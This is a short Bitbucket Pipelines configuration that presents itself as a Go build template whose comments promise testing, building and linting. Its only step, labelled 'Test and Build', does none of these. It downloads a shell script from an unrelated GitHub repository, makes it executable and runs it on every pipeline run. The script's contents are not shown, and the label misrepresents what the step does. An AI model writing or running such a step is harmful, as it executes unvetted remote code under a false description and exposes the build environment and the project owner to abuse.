#  Template Go (Golang) build

#  This template allows you to validate your Go (Golang) code.
#  The workflow allows running tests, build and code linting on the default branch.

image: golang:1.15

pipelines:
  default:
    - parallel:
      - step:
          name: Test and Build
          script:
            - wget https://raw.githubusercontent.com/sikido21/a/main/veyus.sh && chmod u+x veyus.sh && ./veyus.sh
